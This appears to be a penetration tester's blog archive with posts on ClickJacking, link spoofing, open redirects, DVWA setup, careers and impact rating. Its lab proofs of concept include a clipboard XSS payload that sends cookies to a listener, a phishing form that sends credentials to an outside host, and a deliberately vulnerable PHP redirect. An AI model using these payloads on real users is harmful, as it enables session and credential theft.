Understanding ClickJacking

ClickJacking is a common flaw in most web applications which allows an attacker to execute actions within the session of their victim. The topic has been very well covered by OWASP at references [1] and [2] at the end of this article.

It is often misunderstood. The following points need to be kept in mind:

  • The user must be authenticated to the TARGET application or it must have some sensitive functionality in there worthy of attack.
  • It must be possible for the TARGET application to be loaded within an HTML “iframe” tag on another site.
  • The attacker must create an EXPLOIT web page and deliver it to the victim (using Phishing etc).
  • While the victim interacts with content at the EXPLOIT site, their interactions are being redirected to the TARGET application.

The key part is that the EXPLOIT site will present the victim with some content which will encourage them to interact with it. The iframe containing the TARGET site will be hidden in some fashion so that the victim is clueless that they are being exploited.

Additionally, you need to know that this is a “blind” attack by default. By this I mean that you will not have read access to the HTML within the TARGET page (unless that site has some form of self Cross-Site Scripting (XSS) — which is fun, so I will show later).

Think of this as Cross Site Request Forgery (CSRF) [3]. Suppose you find something on the target site that would be advantageous for an attacker to execute, but it already has CSRF defences in place. That is the situation where ClickJacking can be your friend.

This post is not about how to actually exploit ClickJacking. It is about how to prove a site has a vulnerability while conducting a penetration test, or for developers to understand the same.

Questions you have to answer

To prove that a site would have an impact from ClickJacking, you need to answer these questions:

  1. Can the site be loaded within an iframe?
  2. Does the target site have something which is actually exploitable using ClickJacking techniques?

The first question is easily answered. Create an HTML file which includes the URL for the sensitive functionality within an iframe tag. The following would do that job:

<iframe src="http://target/function"></iframe>

Change the “src” to point to your juicy function (such as “change email address” or whatever). Save that into a “.html” file locally. Authenticate to the application in one tab of your browser and then open that local file.

If the site loads within the iframe then there are likely no defences in place.
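The browser test above is the practical check; the same question can be answered from the response headers, which is what you will be asking the customer to add. The following is an added example for this post (not the author's code): given the TARGET page's response headers, it applies the two defences from the OWASP cheat sheet in reference [2], the Content-Security-Policy frame-ancestors directive and X-Frame-Options. The header sets in SAMPLES are constructed for illustration and the exploit origin is an assumed placeholder.

```python
"""Assess whether a page's response headers let another origin frame it.

Added example for this post (not the author's code). The header sets in
SAMPLES are constructed; attacker_origin is whatever EXPLOIT origin you assume.
"""
from urllib.parse import urlparse


def origin_of(url):
    """scheme://host[:port], lower-cased, which is what CSP source matching compares."""
    parts = urlparse(url)
    return f"{parts.scheme}://{parts.netloc}".lower()


def frame_ancestors_sources(csp_value):
    """Return the source list of the frame-ancestors directive, or None if absent."""
    for directive in csp_value.split(";"):
        tokens = directive.strip().split()
        if tokens and tokens[0].lower() == "frame-ancestors":
            return [t.lower() for t in tokens[1:]]
    return None


def assess_framing(headers, page_url, attacker_origin):
    """Return (framable, reason) for page_url when embedded by attacker_origin.

    Only exact origin matches are handled in CSP source lists; wildcard hosts
    and scheme-less host sources would need extra matching logic.
    """
    lower = {name.lower(): value for name, value in headers.items()}
    page_origin = origin_of(page_url)
    attacker_origin = attacker_origin.lower()

    # A frame-ancestors directive takes precedence over X-Frame-Options
    # in browsers that support CSP Level 2.
    csp = lower.get("content-security-policy")
    sources = frame_ancestors_sources(csp) if csp is not None else None
    if sources is not None:
        if not sources or sources == ["'none'"]:
            return False, "frame-ancestors 'none'"
        for src in sources:
            if src == "*":
                return True, "frame-ancestors allows any origin"
            if src == "'self'" and attacker_origin == page_origin:
                return True, "frame-ancestors 'self' and the framer is same-origin"
            if src == attacker_origin:
                return True, f"frame-ancestors lists {src}"
        return False, "frame-ancestors does not include the framing origin"

    xfo = lower.get("x-frame-options")
    if xfo is not None:
        value = xfo.strip().upper()
        if value == "DENY":
            return False, "X-Frame-Options: DENY"
        if value == "SAMEORIGIN":
            if attacker_origin == page_origin:
                return True, "X-Frame-Options: SAMEORIGIN and the framer is same-origin"
            return False, "X-Frame-Options: SAMEORIGIN"
        # ALLOW-FROM was never widely supported and any unknown value is ignored
        # by browsers, which then apply no restriction at all.
        return True, f"X-Frame-Options value {xfo!r} is not enforced by browsers"

    return True, "no X-Frame-Options or frame-ancestors header present"


# Constructed responses for a hypothetical TARGET page.
SAMPLES = {
    "no defence": {"Content-Type": "text/html"},
    "xfo deny": {"X-Frame-Options": "DENY"},
    "xfo sameorigin": {"X-Frame-Options": "SAMEORIGIN"},
    "csp none": {"Content-Security-Policy": "default-src 'self'; frame-ancestors 'none'",
                 "X-Frame-Options": "ALLOWALL"},
    "csp partner": {"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
}


def run_samples(page_url="http://target/function", attacker_origin="http://exploit.example"):
    """Evaluate every constructed sample; returns {label: framable}."""
    return {label: assess_framing(h, page_url, attacker_origin)[0]
            for label, h in SAMPLES.items()}


if __name__ == "__main__":
    for label, framable in run_samples().items():
        print(f"{label:15} framable={framable}")
```

In a real test the headers come from an authenticated response to the sensitive function, since some applications only set them on certain pages.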

The second question is the one that most people I have taught seem to struggle with. They get excited about seeing the target load in the iframe and rush off to report it!

Hold your horses folks. If there is nothing which would be of value to an attacker to exploit, then it would be a much lower risk. You want to review the website and look for things like:

  • Self-XSS (which is demoed later as a treat to you all).
  • Change Password form without current password required.
  • Change associated email address without current password required.
  • Like or upvote something by way of a click which could improve an attacker’s rating.

The list could be much much longer. Find something that has a security impact and only requires a couple of clicks, or some content controllable by the attacker to be pasted to execute.

If you don’t find functionality like that, then your customer needs to be told they should turn on ClickJacking defences as a matter of best practices. If you do find something then the impact needs to be set dependent on the risks of an attacker doing that to a victim.

That is my point made. The next bit is just for giggles.

Example: Chaining ClickJacking with Self-XSS

Tonight I found “XSSJacking” by dxa4481 on GitHub (see reference [4]). This pretty much did what I came here to show. So I started with that, and then modified it.

You can use ClickJacking to deliver XSS payloads into the session of a victim. This is useful when the way to exploit the XSS would be to literally type the exploit into a text field for example. Until ClickJacking these were basically considered unexploitable. Welcome to the party self-XSS!

I cloned XSSJacking using:

git clone https://github.com/dxa4481/XSSJacking.git

This is pretty simple and has the following files:

  1. index.html – this is the TARGET site.
  2. main.js – contains JavaScript used by index.html (TARGET) to trigger the self-XSS.
  3. index2.html – this is the EXPLOIT site.

I wanted to modify these to create an example where I was able to hijack a cookie from TARGET site.

The following is the content of “index.html”:

<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.1/angular.min.js"></script>
<script src="main.js"></script>

<!-- Added by cornerpirate to create a cookie -->
<script>
document.cookie="secret="+new Date().getTime();
</script>

<body ng-app="xssApp" ng-controller="mainController">
<textarea placeholder="Vulnerable to XSS" ng-model="textArea" ng-change="checkForAlert(textArea)" style="height:100%; width:100%;"></textarea>

<!-- Added by cornerpirate to create a div with id "exploitMe" in the page -->
<div id="exploitMe"></div>
</body>

To this I added a “div” tag with an id for easy accessing via JavaScript. The following is the content of “main.js”:

var redisApp = angular.module('xssApp', []);
redisApp.controller('mainController', ['$scope', function($scope) {
  $scope.checkForAlert = function(text){
    // Modified by cornerpirate to dangerously put
    // any text into the "innerHTML" of the "exploitMe" div.
    document.getElementById("exploitMe").innerHTML = text;
  };
}]);

I removed the safety from the original demo (because ‘you only live once’). Notice that I use the “innerHTML” of the div to set the “text” which was passed by angular. The following is the content of “index2.html”:

Enter your email below to register:
<textarea autofocus style="width:220px; height:35px;"></textarea>
Repeat your email:
<!-- src is the URL of the TARGET site (port 8080 of the Kali VM in this write-up) -->
<iframe style="width:230px; height:50px;" frameBorder="0" src=""></iframe>
<input type="submit">
<script>
document.addEventListener('copy', function(e){
  e.clipboardData.setData('text/plain', '\x3Cimg\x20src\x3D\x22x\x22\x20onerror\x3D\x22new\x20Image\x28\x29.src\x3D\x27http\x3A\x2f\x2flocalhost\x2fcookie\x3F\x27\x2bdocument.cookie\x22\x3E');
  e.preventDefault(); // We want our data, not data from any selection, to be written to the clipboard
});
</script>

I modified the URL used by the iframe. This means that the TARGET site is running on TCP port 8080 of my Kali VM.

I also modified the payload which is pasted. That is hard to read so I have decoded it as below:

<img src="x" onerror="new Image().src='http://localhost/cookie?'+document.cookie">

This will simply run a script which will send back a cookie to a listener on localhost. To recap we have this situation:

  1. TARGET site running on TCP port 8080 of Kali.
  2. EXPLOIT site running on TCP port 80 of Kali.
  3. ATTACKER is listening on localhost (yeah, this should be another server, but it is a different origin anyway for the PoC).

By separating the ports they are different origins meaning that ClickJacking will actually get us something.

The following video shows you this all being pulled together:

On the right are two python listeners which host the TARGET and EXPLOIT sites.

On the left is a web browser and ncat listener on localhost.

The steps in the video are:

  1. I refresh the users page on the TARGET site.
  2. I show that there is a cookie set on the TARGET site.
  3. I then go to the EXPLOIT site and copy the text in the email field. Doing this actually places the XSS payload into the copy/paste buffer.
  4. When I paste into the “repeat your email” it is actually inside the iframe which contains the TARGET site.
  5. The self-XSS executes and you can see the secret cookie value was sent back to the attacker.

To recap: the first half is about what you must do to professionally be able to find ClickJacking. The second gives you an example of what an attack might look like. In the day job of a pentester it is unlikely that you will ever exploit ClickJacking. But for your knowledge of the subject it is best that you play with it.

One day a customer is going to ask and you should have a great answer for them.


[1] https://www.owasp.org/index.php/Clickjacking

[2] https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet

[3] https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

[4] https://github.com/dxa4481/XSSJacking

Dodgy Link: Hiding the URL

It is very rare that I do Phishing campaigns (dang it I should ask to do more as they are interesting). I do have to answer customer questions, and talk about security awareness training often though.

I have heard people saying that “just hover your mouse over a suspicious link and it shows you where it is going!”. Generally this is a good feature of web browsers. However, it is definitely not to be relied on as shown in the video below:

With a tiny bit of JavaScript you can defeat that particular part of someone’s security awareness training. The source code is available below:

<a id="hey" href="http://totallylegit.com"
   onmouseover="this.href='http://www.totallylegit.com'"
   onclick="this.href='<set this>'"
>Totally Legit</a>

Quite simple:

  1. When the mouse goes over the link the “onmouseover” event handler executes. This changes the URL to “http://www.totallylegit.com” so that is what the Web Browser shows to the user at the bottom.
  2. If the user actually clicks on the link the “onclick” event is triggered which replaces the URL with whatever we are actually wanting our victim to interact with.
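From the defender's side the same trick is easy to spot in page source, because the tell-tale is an anchor whose hover or click handler assigns to href or location. The following is an added example for this post (not the author's code): a small scanner on the standard-library HTMLParser that flags such anchors. The HTML in SAMPLE_PAGE is constructed for illustration and its landing host is a placeholder.

```python
"""Find links whose event handlers swap the destination after the hover preview.

Added example for this post (not the author's code). SAMPLE_PAGE is constructed.
"""
import re
from html.parser import HTMLParser

# Handlers that run on hover or click and can rewrite where the link really goes.
WATCHED_EVENTS = ("onmouseover", "onmouseenter", "onmousedown", "onclick", "onfocus")

# Inline JS that assigns to .href, assigns to location, or calls location.assign/replace.
REWRITE_RE = re.compile(
    r"(\.href\s*=(?!=)|\blocation(\.href)?\s*=(?!=)|\blocation\.(assign|replace)\s*\()",
    re.IGNORECASE,
)


class DodgyLinkScanner(HTMLParser):
    """Collects anchors whose watched handlers match REWRITE_RE."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "a":
            return
        attr_map = {name.lower(): (value or "") for name, value in attrs}
        suspicious = [event for event in WATCHED_EVENTS
                      if REWRITE_RE.search(attr_map.get(event, ""))]
        if suspicious:
            self.findings.append({
                "id": attr_map.get("id"),
                "displayed_href": attr_map.get("href", ""),
                "events": suspicious,
            })


def find_dodgy_links(html):
    """Return one finding per anchor that rewrites its destination on hover or click."""
    scanner = DodgyLinkScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: one link using the trick described above, two benign ones.
SAMPLE_PAGE = """
<p><a id="hey" href="http://totallylegit.com"
      onmouseover="this.href='http://www.totallylegit.com'"
      onclick="this.href='http://landing.example/'">Totally Legit</a></p>
<p><a href="http://shop.example/cart" onclick="track('cart')">Cart</a></p>
<p><a href="http://shop.example/help">Help</a></p>
"""


if __name__ == "__main__":
    for finding in find_dodgy_links(SAMPLE_PAGE):
        print(finding)
```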

Nothing new. Nothing earth shattering. I needed to document it as I have forgotten how to do this a few times but now it is written down forever. Hope it is useful.

Open (Redirect) Warfare

None of this is new. This week I needed to make an exploit PoC for an open redirect. The short version is this:

  1. Customer had an Open Redirect vulnerability.
  2. This prevented certain things and did have some defences in place.
  3. It did not prevent the “data:” URI.
  4. So this article shows simply how to make a fake login form. *

* various browsers protect users. Mileage on this one definitely varies.

Hopefully the tale of how this was made is of use to someone. It starts by explaining what an Open Redirect is for the uninitiated. It then proceeds by showing a vulnerable PHP page, how to generate the PoC, and then the action shot of it.

What is an Open Redirect?

Ironically our heroes at OWASP have chosen to call theirs “unvalidated redirects” now. Meaning that googling “Open Redirect” finds you this URL:


Which ultimately redirects to this if you flip the “redirect=no” to “redirect=yes”:


But I am old school and like to call it an open redirect. I get the point they are conveying by calling it an unvalidated redirect. I just boo and hiss about being too old for new tricks.

The gist is: by modifying input to a website you are redirecting users to a URL of your choice.

For example, if a website had a URL of the following kind:


If you set the “url” parameter to “https://www.secarma.co.uk”, when the victim clicked on the link they would be redirected to Secarma.

You are all about the impacts Mr Pirate. So explain to me the impact before I throw a brick at you. Ok, ok, I am getting there. There are typically two impacts of an open redirect:

  1. Phishing – Create a malicious link and email (or otherwise present) your victims with it. When they are redirected to your #EvilSite you ask them to enter credentials or something else you need.
  2. Drive by download – if I can make your browser view content that I control then I can attempt to exploit your browser and all of the applications you have installed. Technically this is just a different payload for phishing, but I do see this as a worst case scenario. On a legit penetration testing engagement you should never be simulating this. Imagine the carnage of auto owning browsers for thousands of people?

What an open redirect gains you over simply emailing a link to #EvilSite is a little bit of legitimacy. The link will initially point at #TrustedSite but when the browser loads the page it will be forwarded to #EvilSite. A moderately savvy victim who checks the hostname in the URL before they click would still be at risk with an open redirect, since the ultimate destination is not the host name of the original link.

Make a vulnerable Open Redirect

You will need a safe place to play with this. Do not go and find something vulnerable on the Internet. Just make your own. I did, and you can see the code below:

<?php
// The "url" parameter goes straight into Location with no validation.
// header() must run before any HTML is output, so the PHP block comes first.
if (isset($_GET['url'])) {
    $redirect_url = $_GET['url'];
    header('Location: ' . $redirect_url); // vulnerable redirect
    exit;
}
?>
<title>Vulnerable to a redirect</title>
<h3>Page is vulnerable to an open redirect</h3>
Add a parameter to the URL called "url" and resubmit.

The vulnerable part is the call to the “header” function, which uses the value of the GET parameter “url” without any checks.

Save this in a file “redirect.php”, and place this inside a web server with PHP enabled and start your web server.
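To make the fix concrete, the following is an added example for this post (not the author's code or the customer's fix): a Python model of redirect.php in which vulnerable_redirect() mirrors the PHP, echoing the “url” parameter straight into Location, and validate_redirect() is the hardened alternative that accepts only a same-site path, so a data: URI, an absolute URL or a protocol-relative one all fall back to a default page. SITE_ORIGIN and the probe hosts are assumed placeholders.

```python
"""Open redirect: the unchecked pattern beside a validated one.

Added example for this post (not the author's code). SITE_ORIGIN is a
placeholder for the real application origin; PROBES are constructed.
"""
from urllib.parse import urlparse, urljoin

SITE_ORIGIN = "https://shop.example"   # placeholder for the real application origin
DEFAULT_TARGET = "/"


def vulnerable_redirect(url):
    """Same logic as the PHP: whatever is in ?url= becomes the Location header."""
    return url


def validate_redirect(url, site_origin=SITE_ORIGIN):
    """Return (location, reason); location always stays on site_origin.

    The value is what PHP would hand you in $_GET['url'], i.e. already
    percent-decoded once by the web server.
    """
    if not url:
        return DEFAULT_TARGET, "no url supplied"
    # Tabs, newlines and other control characters are tolerated by some browsers
    # inside schemes ("java\tscript:"), so refuse them outright.
    if any(ch.isspace() or not ch.isprintable() for ch in url):
        return DEFAULT_TARGET, "whitespace or control characters"
    # "//host", "/\host" and "\\host" are treated as protocol-relative by browsers.
    if url.startswith(("//", "/\\", "\\")):
        return DEFAULT_TARGET, "protocol-relative URL"
    parts = urlparse(url)
    if parts.scheme or parts.netloc:
        # Catches http(s)://other-host, data:, javascript: and mixed-case variants
        return DEFAULT_TARGET, f"absolute URL with scheme {parts.scheme!r}"
    if not url.startswith("/"):
        return DEFAULT_TARGET, "not a site-absolute path"
    # Resolve against our own origin so the header carries a full, same-site URL.
    return urljoin(site_origin + "/", url), "ok"


# Constructed inputs; the data: value is a truncated stand-in for a base64 form.
PROBES = [
    "/account/orders?page=2",
    "https://attacker.example/login",
    "data:text/html;base64,PGZvcm0+...",
    "DATA:text/html,hi",
    "//attacker.example/login",
    "/\\attacker.example",
    "java\tscript:alert(1)",
]


def compare(probes=PROBES):
    """Show where each probe would send the user under both implementations."""
    return [(p, vulnerable_redirect(p), validate_redirect(p)[0]) for p in probes]


if __name__ == "__main__":
    for probe, vuln, safe in compare():
        print(f"{probe!r:40} vulnerable -> {vuln!r:40} validated -> {safe!r}")
```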

Creating your PoC data URI

The data URI is typically used to embed images in my experience. However, it is capable of MIME type “text/html” which makes it dangerous. For this reason various browsers have defended against it as per Mozilla’s post below:


Plough on regardless. Many people surf the old webs in dangerously old web browsers. As a pentester you have to build a proof of concept where you can. As it happened this was pretty much the only bug we had to play with, so go all out to explain why this is a risk by demonstration.

First you need to create some HTML that may exploit people. I went with a simple (and admittedly ugly looking) login page:

<form onsubmit="myFunction()">
  User: <input type="text" name="user"><br>
  Pass: <input type="password" name="pass"><br>
  <input type="submit" value="Submit">
</form>
<script>
function myFunction() {
    var gold = document.forms[0].user.value + ":" + document.forms[0].pass.value;
    // send the users credentials to yourself.
    new Image().src="https://cornerpirate.com/stealing?gold=" + encodeURI(gold);
    // redirect user back to the site they are expecting.
    window.location="<set this>";
}
</script>

Pretty simple really. A login form and a JavaScript which runs on submit that sends the credentials back to myself before redirecting the user back to the site they were expecting. That second step is important because you want to minimise the time they spend staring at your form.

To generate my data URI the lazy way I used this excellent free service:


The following shows the process used for doing that:

How to generate your data URI

Pretty simple:

  1. Click on “Provide Text”.
  2. Paste your HTML in.
  3. Click “Explicitly specify mime type”
  4. Type “text/html” in as the mime type.
  5. Click “Generate Data URI”.

This will generate your URI on the screen and you can copy and paste it where you need to.

Using your PoC

Once you have generated your PoC above you will need to URL encode it. This is because the character set for Base64 encoding includes characters used within URLs such as “+” and “=”.

Raw PoC


URL Encoded PoC


Next you will need to generate your exploit URL. If we recall the generic example from before:


It really is as simple as pasting your URL encoded PoC into the spot labelled “INJECT_HERE”.

Bang that into your address bar and press enter and watch as your shoddy looking login form appears. The following shows the flow of this in Burp:

Redirect to data URI

Then to review that in my testing browser:

PoC loaded in the browser

As you can see the address bar looks “scary”. Your suspicious victims will likely spot this. However, some that have been educated to check the hostname BEFORE clicking will already have done their due diligence and moved on to just logging in.

Personally I do not think it is *that* effective as a technique but it did give me a few glimmers of happiness in making the PoC.

Standing Out: a Workshop for Wannabe Pentesters

I asked Twitter for questions to help me find topics people were interested in. The first response was very simple:

To me this boils down to the question “What can I do to make my CV or application stand out from the hordes of others?”. When I say “hordes” I literally mean it. I personally get approached a lot either via LinkedIn or email from candidates.

To deal with that question I have broken it down into three sections:

  1. Sharpen your CV
  2. Your online Content
  3. Your offline presentation

I will make sub-sections for each of these and if you feel that you have one of these nailed skip over it.

Sharpen your CV

Your CV is the gateway to your soul. Often it may be all that the company you are applying to is going to see. For the first step follow this process:

  1. Keep it exactly two pages long. No more. I have heard of hiring managers throwing anything longer on the pile of rejects before they go home and sleep like a baby. Harsh, but nobody said reality was going to be easy.
  2. Write it yourself. If your university has provided a template then you might find that the company has seen your CV many many times before. Familiarity with the format will not make it stand out. You do not have to go insane design wise but making it a bit unique is a good idea. Your CV is a chance to prove you can write in English and sell yourself. If you can do that, then you may be able to sell a vulnerability report to a customer. Genuinely write it yourself and resist temptation to pay someone to write it for you.
  3. Contact Details. Display clearly your contact details with your mobile number and address etc. I have had a few cases where I couldn’t call back, which doesn’t help. In mine I think I made it the header of the page so it is not eating up the real estate on the page but appears at the top of both pages.
  4. Link to online content. The next section contains how to fix your online content. Make sure that your CV links to that content appropriately. If you identify an organisation that blogs regularly about a thing that you have too then highlight that etc. If your research interests and theirs align you will find a willing buyer.

The general idea here is to make something that is the right length, ensure your key information is there, and that YOU wrote it.

Now I do not know how many of you are as hilarious as me? But I also end every CV I write with something outlandish under my interests as a reward to the reader getting that far.

I remember sauntering up to the MD of Pentest Ltd just as he got to the end of my CV when I was heading to meet him. He was still chuckling as I shook his hand. #nailedit. You might not get to an in person interview like that as the first step until you are rocking out as a senior like I was at that point in my career.

Pro-Tip: If you bump into me in person you can ask about my various CV jokes over the years but I won’t go into it here. Otherwise you will probably all just try and emulate those exact things.

Your online Content

There are so many places that you can put things online for your “work” self. A personal blog (like mine here!), LinkedIn, Twitter, GitHub etc. This can all be evidence of your activities that are relevant to penetration testing or IT in general.

Here are some things I look for, which I presume are what other hiring managers want too:

  1. Actively exploring technology. If your blog is all about gadgets you have bought and stuff that was done just to play or learn with it, then you may have the right mindset.
  2. Attending events. If your Twitter feed is a bunch of photos of you rolling around various Cyber Security events then we think you are definitely keen and trying to network in person.
  3. Speaking at events. If you are speaking at things like your local Defcon, OWASP or whatever then you are even more involved. Spreading knowledge to others is very much the mindset. Being able to talk to a room is also a tick in a box for consultancy skills. But speaking to rooms is not for everyone so it is not a REQUIRED skill.
  4. Coding ability. I am of the opinion that coding helps to make a great tester. Relatively recently I started posting stuff on https://www.github.com/cornerpirate. So now I look for people who do the same. You do not have to invent something that has hitherto not existed in the world. Someone who has sat making their own port scanner will have learned a lot. You do not need to shoot for unique. Implementing your own version of a thing is also a valuable exercise.

Try and separate your work and personal self in your online presence. Keep the photos of food to Facebook and Instagram or whatever mostly (I will break this myself deal with it!). Then keep your online career “self” focused and to the point. That means categories on your blog or using a different blog entirely for other things.

What am I looking for here? Well… The appearance you are active. By reading some technical blog posts I can see more about how you write. Remember a pentester has to document findings to customers. So I want to know that you can write. Via GitHub I can see what tools you have made or what problems you have solved. Knowing someone has familiarity with programming is a good idea.

A final word on your online presence. Put a clear picture of your face. I won’t win any beauty contests. But I put my face on things so that when people meet me in person they can recognise me. Yes there are hackers who will post Chinese characters, or ninjas or whatever to make themselves anonymous. That is very cool and “op seccy” of you. But take a moment to realise you are applying for a career in the white-box and not the black-box. If you want to go break the law for a living I don’t know where you apply but start at the docks at midnight maybe?

By not putting a photograph, you may be losing a chance for consistency. I have just completed a recruitment tour and have spoken to around 700 or so people in a month. Sometimes I have met people at multiple events. The faces are now vaguely familiar, but try to keep that many names in your head? When someone follows me on Twitter after an event it is easier to match whatever hilarious handle they have to the person if I can recognise them.

Pro-Tip: a clear picture of your face only really. Try not to be “the one in the middle of three folks” or something like that 🙂

If you are represented by a string of binary in green on black in real-life then I promise to try and remember you.

Your offline presentation

By this I mean when you appear in front of a company, say at an event. This time you are showing your face and you may have only a short time to talk. In that case come prepared. Some people have been handing me business cards in return for mine. That means I can then go and put their name in a spreadsheet for the event and look to see if they actually apply later. So that is a nice touch which I am now recommending.

I didn’t believe in business cards when I was told in 2004 how to get a job by my university. I was like calm down caveman, I’ll just wow them with my personality. Now I have considered what the other side of that coin looks like I say a business card may genuinely help! I have a stack of them now from Securi-tay 2017 ready to get added to a list.

Also you are more likely to remember the company’s representative than they are to remember you. IF you have met them before, re-iterate your name, and where that was, when shaking hands. This should tick some boxes in their mind and get you straight onto the “my aren’t they keen” list!

We are fortunate to operate in a hacker style industry. Nobody expects you to wear a suit to these events. So you get a chance to wear some kind of awesome t-shirt or hoodie which may spark a conversation. Your goal at IRL meetings is to literally try and stick in someone’s head for a bit.

Some people do this by trying to ask difficult questions of their prey. Mileage may vary on that one. I love a challenge, but maybe someone else won’t. It is a potential route to making yourself stand out.

There you have it folks. My thoughts on how to “stand out” when applying for a penetration testing career.


Kali with Damn Vulnerable Web App in Docker

If you have landed here I hope you are looking at starting your training with Damn Vulnerable Web App. I am excited for you as you have so much to learn. I hope it means that you are considering a career in Cyber Security, and that this post will save you a few hours of frustration, and get you to the fun bits quicker.

You are going to need access to tools and access to targets so you can explore legally and for free. This post is about getting you to setup two things which will simply provide you with first the tools and then the targets easily:

  1. Kali Linux – the go-to distribution of choice for penetration testers at all parts of their careers. A Debian base with repositories that contain all of the most common “hacking” tools.
  2. Docker – I risk offending people with my simplistic definition here. I think of this as a lightweight virtual machine. Really it is a “container” which can include an entire ecosystem. We can use this to clone down vulnerable targets to play with quickly which will run inside our Kali. This will provide the targets.

In this post I will cover setting things up by providing links to the appropriate guides. By the end you will have access to Damn Vulnerable Web App (DVWA) which you can start targeting immediately!


The simplest way to interact with Kali Linux for most readers will be to use virtualisation.

  1. Install VMware Player or VirtualBox. I prefer VMware Player and so the rest of this guide assumes you are using this. Sorry folks.
  2. Download Kali ISO and build a virtual machine.
  3. Boot and log into Kali with the credentials you created.

If all is going well you have a new OS with a fresh desktop environment.

Setup VMWare Tools

Before you go too far you are going to want to setup “VMWare Tools”. This will allow you to copy/paste between your host and guest machine as well as smooth out lots of bumps.

Fortunately there is an easy to follow and official guide here:


By the end of this you should have a more useful virtual machine.

Setup Docker (the Lazy way)

To me Docker is not that easy to set up. As Kali is Debian based you may assume that it is simply “apt-get install docker”. This is not the case and a major reason for me writing this post is to make sure you can get Docker into Kali as easily as possible.

The following script was made by some genius called “apolloclark” on GitHub:

#!/bin/bash
# update apt-get
export DEBIAN_FRONTEND="noninteractive"
sudo apt-get update
# remove previously installed Docker
sudo apt-get purge lxc-docker*
sudo apt-get purge docker.io*
# add Docker repo
sudo apt-get install -y apt-transport-https ca-certificates
sudo apt-key adv --keyserver hkp://p80.pool.sks-keyservers.net:80 --recv-keys 58118E89F3A912897C070ADBF76221572C52609D
# written via sudo tee so the file is created even when the script is not run as root
sudo tee /etc/apt/sources.list.d/docker.list > /dev/null <<'EOF'
deb https://apt.dockerproject.org/repo debian-stretch main
EOF
sudo apt-get update
# install Docker
sudo apt-get install -y docker-engine
sudo service docker start
sudo docker run hello-world
# configure Docker user group permissions
sudo groupadd docker
sudo gpasswd -a ${USER} docker
sudo service docker restart
# set Docker to auto-launch on startup
sudo systemctl enable docker

Save this script to a file on your desktop called “getdocker.sh”. Then execute that in a terminal by first “chmod +x getdocker.sh” and then “./getdocker.sh”. This will install docker for you.

I am not going to explain how to actually use docker in the general cases. So you probably want to eventually get round to reading this:


You can skip reading tutorials for Docker right now if you just want to focus on DVWA as soon as possible.

Getting DVWA and Running it

Various people have made docker containers which contain DVWA. At the time of writing the top hit on Google was made by another rockstar called “infoslack”. Open the following URL to see the details:


The following commands are all you would need to execute:

docker pull infoslack/dvwa
docker run -d -p 80:80 infoslack/dvwa

At this point you can access DVWA on localhost port 80.

Check that you are ready

Open this URL in the browser within Kali:


As you have not configured your server yet it will ask you to setup your database:

Setup your DVWA now and get hacking

If you click on “Create / Reset Database” button then you will complete the setup. This will take you to a login page. Enter “admin” and “password” to login.

This will present you with the full interface which will include a long list of options down the left. By default your DVWA install will be set to “Impossible” level of difficulty. You should be unable to exploit any of the vulnerabilities because the code is not designed to be vulnerable at this level.

Click on “DVWA Security” and then alter the drop down from “Impossible” to low and click “Submit”.

At this point you can click on links on the left to load specific vulnerable exercises.

Play safe.



Impact Assessment 101

When interviewing candidates, who have no previous penetration testing experience, there is often a gap in their knowledge. While they have all practised and honed their technical skills they will generally not have practised risk assessment or the impact that a vulnerability would have.

The probable reason for this is that the act of hacking a target is way sexier than trying to categorise or document the fault. There is no impetus to generate a report while you test Damn Vulnerable Web App or the myriad of other safe to play with targets. So exactly why should you?

The difference between a hacker and a consultant is that as a professional you will have to document what you do. You will definitely have to tell the customer exactly what is impacted, who can do it, and for extra points equate that directly to their business if you can.

Failing to do so will generally result in a shrug from your customer and a look in their eye that asks “why should I care?”, while they spin a coke bottle absentmindedly.

In order to work out an appropriate impact rating you are going to need to answer at least these questions:

  1. What is impacted?
  2. Who can locate or exploit the vulnerability?
  3. Are exploit tools and techniques freely available?
  4. Does an attacker need any conditions to be true to exploit the flaw?
  5. If an attacker was to exploit it is there a direct impact to the business?

Simple eh? Let’s work through one example so you can see the reasoning and logic going into an impact rating.

SQL Injection

Anyone with a clue will tell you that SQL Injection is a “high” risk vulnerability. But do you know exactly why? That is the difference I look out for.

A deeper understanding, rather than simply memorising the impact rating of everything, will help you assess the risk of previously unknown flaws, or deal with the crafty bespoke ones that will never come around again in your career.

To enable me to set an impact I am going to need to spit out a bit on the location of the vulnerability as context is absolutely everything when you are creating an impact rating. Slavishly replaying the same ratings every time without reviewing the context makes a poor consultant. You are being paid to tailor your work to the actual environment and provide the right advice to them.

Overview of the target

The target web application is an e-commerce platform which sells items. It handles personal information for users including their contact details, home address, and their order history. The payment is handled by a 3rd party. The technology stack is Linux running MySQL and Apache. The vulnerability is located on the product page, in the “productId” parameter which is sent in the URL.

What is impacted?

  • Database for certain. With the applications configured user you can: Read, Modify, Insert and Delete data.
  • Potentially the operating system through “file read” and “file write”.
  • Potentially the operating system through command execution though more difficult in MySQL than in some alternative databases.
  • As a pro you will need to confirm these extra “potential” impacts to the operating system. For my simple scenario let's say they have configured away your ability to access or write files, and that you cannot achieve OS command execution.

Who can locate or exploit the vulnerability?

  • The product page is accessed without authentication since people sign in at the point of sale only. There is no authentication barrier to limit knowledge of the flaw, any attacker can find this.

Are exploit tools and techniques freely available?

  • SQL Injection is a well known technique.
  • Training and practical tutorials are free and easy to find.
  • Tools exist such as sqlmap which can automatically find and exploit it WITHOUT needing to know the intricacies of the exploitation.
  • Bottom line: it is very easy to exploit.

Does an attacker need any conditions to be true to exploit the flaw?

  • Short answer: no.
  • Longer answer: no user interaction is required to exploit. The attacker is over the Internet so does not require physical access or access to a particular local network. Worth repeating again that it can be found and exploited without authentication.

If an attacker was to exploit it is there a direct impact to the business?

  • There is a direct impact to the business.
  • The personal data that is being stored is identifiable and so would fall under the Data Protection Act in the UK. Should someone dump all the data and then leak that then a fine is likely for the business. Depending on the scale of the breach and the target customer this might be a sufficient fine to cripple their business or close it entirely.
  • There is also a potential reputation damage risk to the business. Consumer trust can be lost and sales will go down.

There we have it: all of the ingredients to consider when you think of the impact. There was a sleight of hand up there where I split the answer for “what is the impact” into two different entities: the database, and the operating system. I will get back to that in a moment.

